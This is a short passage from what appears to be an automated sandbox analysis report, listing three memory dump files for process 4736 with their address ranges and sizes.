                                                                                                              • memory/4736-30-0x00000224C7280000-0x00000224C72AA000-memory.dmp
                                                                                                                Filesize

                                                                                                                168KB

                                                                                                              • memory/4736-31-0x00007FFE8BF00000-0x00007FFE8C109000-memory.dmp
                                                                                                                Filesize

                                                                                                                2.0MB

                                                                                                              • memory/4736-32-0x00007FFE8A1B0000-0x00007FFE8A26D000-memory.dmp
                                                                                                                Filesize

                                                                                                                756KB